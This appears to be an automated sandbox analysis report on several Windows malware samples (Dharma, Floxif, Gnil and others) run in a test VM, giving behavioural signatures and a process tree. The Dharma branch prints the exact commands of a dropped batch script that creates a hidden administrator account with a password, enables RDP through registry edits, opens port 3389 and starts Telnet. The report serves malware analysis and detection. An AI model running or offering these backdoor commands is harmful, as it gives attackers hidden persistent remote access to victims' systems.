Analysis

  • max time kernel
    264s
  • max time network
    264s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-08-2024 16:41

Errors

Reason
Machine shutdown

General

Malware Config

Signatures

  • BadRabbit

    Ransomware family discovered in late 2017, mainly targeting Russia and Ukraine.

  • Floxif, Floodfix

    Floxif aka FloodFix is a file-changing trojan and backdoor written in C++.

  • Detects Floxif payload 1 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 9 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Sets service image path in registry 2 TTPs 8 IoCs
  • ACProtect 1.3x - 1.4x DLL software 1 IoCs

    Detects file using ACProtect software.

  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 46 IoCs
  • Impair Defenses: Safe Mode Boot 1 TTPs 12 IoCs
  • Loads dropped DLL 52 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 49 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 5 IoCs
  • NTFS ADS 11 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 32 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 33 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Virus
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1216
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbfd4046f8,0x7ffbfd404708,0x7ffbfd404718
      2⤵
        PID:3648
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
        2⤵
          PID:3948
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4808
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8
          2⤵
            PID:2324
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
            2⤵
              PID:632
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
              2⤵
                PID:3076
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
                2⤵
                  PID:4220
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3652
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5316 /prefetch:8
                  2⤵
                    PID:2308
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
                    2⤵
                      PID:2668
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6012 /prefetch:8
                      2⤵
                        PID:3680
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5872 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4712
                      • C:\Users\Admin\Downloads\SpySheriff.exe
                        "C:\Users\Admin\Downloads\SpySheriff.exe"
                        2⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of FindShellTrayWindow
                        PID:3404
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
                        2⤵
                          PID:4416
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5420 /prefetch:8
                          2⤵
                            PID:1292
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:8
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3388
                          • C:\Users\Admin\Downloads\xpajB.exe
                            "C:\Users\Admin\Downloads\xpajB.exe"
                            2⤵
                            • Executes dropped EXE
                            • Drops file in Program Files directory
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: GetForegroundWindowSpam
                            PID:2664
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
                            2⤵
                              PID:1640
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5012 /prefetch:8
                              2⤵
                                PID:3068
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 /prefetch:8
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                PID:760
                              • C:\Users\Admin\Downloads\Mabezat.exe
                                "C:\Users\Admin\Downloads\Mabezat.exe"
                                2⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:3680
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
                                2⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:2488
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3376 /prefetch:8
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:444
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                PID:556
                              • C:\Users\Admin\Downloads\Gnil.exe
                                "C:\Users\Admin\Downloads\Gnil.exe"
                                2⤵
                                • Drops file in Drivers directory
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4776
                                • C:\Windows\SysWOW64\drivers\spoclsv.exe
                                  C:\Windows\system32\drivers\spoclsv.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1364
                              • C:\Users\Admin\Downloads\Gnil.exe
                                "C:\Users\Admin\Downloads\Gnil.exe"
                                2⤵
                                • Drops file in Drivers directory
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4820
                                • C:\Windows\SysWOW64\drivers\spoclsv.exe
                                  C:\Windows\system32\drivers\spoclsv.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4196
                              • C:\Users\Admin\Downloads\Gnil.exe
                                "C:\Users\Admin\Downloads\Gnil.exe"
                                2⤵
                                • Drops file in Drivers directory
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:632
                                • C:\Windows\SysWOW64\drivers\spoclsv.exe
                                  C:\Windows\system32\drivers\spoclsv.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1924
                              • C:\Users\Admin\Downloads\Gnil.exe
                                "C:\Users\Admin\Downloads\Gnil.exe"
                                2⤵
                                • Drops file in Drivers directory
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1252
                                • C:\Windows\SysWOW64\drivers\spoclsv.exe
                                  C:\Windows\system32\drivers\spoclsv.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2852
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
                                2⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:3144
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3364 /prefetch:8
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:1316
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6328 /prefetch:8
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4056
                              • C:\Users\Admin\Downloads\Floxif.exe
                                "C:\Users\Admin\Downloads\Floxif.exe"
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3820
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 436
                                  3⤵
                                  • Program crash
                                  PID:784
                              • C:\Users\Admin\Downloads\Floxif.exe
                                "C:\Users\Admin\Downloads\Floxif.exe"
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1284
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 400
                                  3⤵
                                  • Program crash
                                  PID:2712
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
                                2⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:1244
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4088 /prefetch:8
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:1640
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6352 /prefetch:2
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                PID:5012
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4656 /prefetch:8
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:4392
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3384 /prefetch:8
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2440
                              • C:\Users\Admin\Downloads\Dharma.exe
                                "C:\Users\Admin\Downloads\Dharma.exe"
                                2⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:1892
                                • C:\Users\Admin\Downloads\ac\nc123.exe
                                  "C:\Users\Admin\Downloads\ac\nc123.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:3000
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c cls
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:752
                                • C:\Users\Admin\Downloads\ac\mssql.exe
                                  "C:\Users\Admin\Downloads\ac\mssql.exe"
                                  3⤵
                                  • Sets service image path in registry
                                  • Executes dropped EXE
                                  • Impair Defenses: Safe Mode Boot
                                  • Suspicious behavior: LoadsDriver
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of SetWindowsHookEx
                                  PID:3820
                                • C:\Users\Admin\Downloads\ac\mssql2.exe
                                  "C:\Users\Admin\Downloads\ac\mssql2.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of SetWindowsHookEx
                                  PID:3840
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\Shadow.bat" "
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3284
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\systembackup.bat" "
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1896
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:408
                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                      WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2684
                                    • C:\Windows\SysWOW64\find.exe
                                      Find "="
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3712
                                  • C:\Windows\SysWOW64\net.exe
                                    net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4608
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4904
                                  • C:\Windows\SysWOW64\net.exe
                                    net localgroup Administrators systembackup /add
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3332
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 localgroup Administrators systembackup /add
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4832
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3536
                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                      WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3340
                                    • C:\Windows\SysWOW64\find.exe
                                      Find "="
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4604
                                  • C:\Windows\SysWOW64\net.exe
                                    net localgroup "Remote Desktop Users" systembackup /add
                                    4⤵
                                    • Remote Service Session Hijacking: RDP Hijacking
                                    • System Location Discovery: System Language Discovery
                                    PID:4880
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
                                      5⤵
                                      • Remote Service Session Hijacking: RDP Hijacking
                                      • System Location Discovery: System Language Discovery
                                      PID:4800
                                  • C:\Windows\SysWOW64\net.exe
                                    net accounts /forcelogoff:no /maxpwage:unlimited
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1476
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4584
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4616
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5088
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
                                    4⤵
                                    • Hide Artifacts: Hidden Users
                                    • System Location Discovery: System Language Discovery
                                    PID:3432
                                  • C:\Windows\SysWOW64\attrib.exe
                                    attrib C:\users\systembackup +r +a +s +h
                                    4⤵
                                    • Sets file to hidden
                                    • System Location Discovery: System Language Discovery
                                    • Views/modifies file attributes
                                    PID:760
                                  • C:\Windows\SysWOW64\netsh.exe
                                    netsh firewall add portopening TCP 3389 "Remote Desktop"
                                    4⤵
                                    • Modifies Windows Firewall
                                    • Event Triggered Execution: Netsh Helper DLL
                                    • System Location Discovery: System Language Discovery
                                    PID:1620
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config tlntsvr start=auto
                                    4⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:1036
                                  • C:\Windows\SysWOW64\net.exe
                                    net start Telnet
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2168
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 start Telnet
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1252
                                • C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe
                                  "C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Enumerates connected drives
                                  • Drops file in Program Files directory
                                  • System Location Discovery: System Language Discovery
                                  • Modifies registry class
                                  • Suspicious use of SendNotifyMessage
                                  • Suspicious use of SetWindowsHookEx
                                  PID:616
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
                                2⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:3068
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
                                2⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Loads dropped DLL
